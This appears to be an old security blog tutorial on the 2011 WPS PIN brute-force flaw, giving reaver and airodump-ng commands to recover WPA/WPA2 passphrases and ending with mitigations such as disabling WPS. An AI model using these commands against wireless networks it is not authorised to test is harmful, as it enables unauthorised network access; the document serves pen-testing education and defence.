Exploiting WPA2 WPS vulnerabilities with Reaver and Backtrack 5

On December 27th, 2011, a new WPS vulnerability was disclosed by Stefan Viehböck. This severe vulnerability has the potential to expose pass phrases of any WPA/WPA2 networks running WPS via a brute force attack. US-Cert have acknowledged this attack with Note VU#723755.

WiFi Protected Setup (or WPS) is designed to make life easier for the average user. In most cases the user will press a button on their wireless access point, this will initiate an easy pairing sequence between the router and the client. If you have recently purchased a wireless router chances are it has WPS and it has probably been enabled by default.

Stefan worked out that the PIN used between the router/client is only 8 characters in length and that the last digit is a checksum, making the brute force password length 7 characters. To make matters worse, the router splits the 7 characters into 2 PINs, one of 4 characters and one of 3 and worse again it will confirm both pins independently. This means that there are 10⁴ + 10³ possible combinations or 11,000 in total.

Some routers have built in protection that will only allow a specific amount of PIN attempts per allotted period of time, this will only slow the attack process though, if someone is willing to wait long enough they will recover the pass phrase.

While Stefan was exploring this vulnerability, so were the good folks at Tactical Network Solutions with their release of a brute force attack software named reaver-wps. Reaver is able to brute force attack WPS PINs with the bold intention of recovering WPA/WPA2 pass phrases, lets take a look.



Using Reaver

This tools is extremely easy to use, I recommend a RTL8187 based wireless adapter (you already have one of these for your WEP pen testing right?).

1. Boot Backtrack 5, establish a network connection and install reaver.
apt-get install reaver

2. First lets take a look at the available networks, I still use airodump-ng for this.

airodump-ng wlan0

3. After finding the BSSID we are interested in (the one you just set up for your proof of concept), issue the following reaver command, replacing "00:11:22:33:44:55" with your target BSSID and "wlan0" with your adapter.

reaver -i wlan0 -b 00:11:22:33:44:55 -c 1 -vv

The above command is attacking BSSID "00:11:22:33:44:55" on interface "wlan0" and channel 1, it is also using a high verbose level.

You can see from the image (click to enlarge) that Reaver begins to brute force combinations of pins. This process can take hours, the Reaver website suggests on average it will take between 4-10 hours to recover a pass phrase. The particular AP I tested the attack against had some PIN rate limiting protection  (as reported by Reaver) that significantly delays but doesn't stop the attack. I didn't leave the attack going more than a few minutes but you get the idea.

Fortunately there is a simple fix, disable WPS or even better, move to WPA2-Enterprise with a RADIUS back end. With any luck the WiFi Alliance and associated manufactures will release firmware updates quickly to resolve this issue, but for the time being millions of wireless access points remain vulnerable to this simple attack.